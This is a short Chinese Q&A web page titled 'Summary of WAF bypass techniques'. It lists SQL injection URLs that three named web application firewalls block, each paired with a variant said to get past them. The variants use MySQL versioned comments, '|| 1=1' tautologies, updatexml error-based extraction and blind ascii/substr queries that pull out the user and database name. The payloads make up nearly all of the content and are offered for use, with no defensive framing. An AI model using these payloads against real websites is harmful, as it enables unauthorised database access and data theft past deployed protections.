当前位置:首页 > 编程笔记 > 正文
已解决

绕WAF手法总结

来自网友在路上 163863提问 提问时间:2023-10-30 21:01:23阅读次数: 63

最佳答案 问答题库638位专家为你答疑解惑

云锁

被拦截

http://www.test123.com/article.php?id=1%20union%20select%201,2,3

绕过

http://www.test123.com/article.php?id=-1/*!36000union*//*!36000distinct*//*!36000select*/1,2,user()

360websec

被拦截

 http://www.xxx.com.cn/productshow.php?id=79'

绕过

 http://www.xxx.com.cn/productshow.php?id=79%20||%201=1

WTSWAF 

被拦截

 http://www.xxx.com.cn/productshow.php?id=-79%20||%20updatexml(1,concat(0x7e,(sElEct%a0user()),0x7e),1)

 绕过

http://www.xxx.com.cn/productshow.php?id=-79%20||%20and%20(ascii(substr(database(),1,1))%20=109)

查看全文

99%的人还看了

猜你感兴趣

版权申明

本文"绕WAF手法总结":http://eshow365.cn/6-28051-0.html 内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!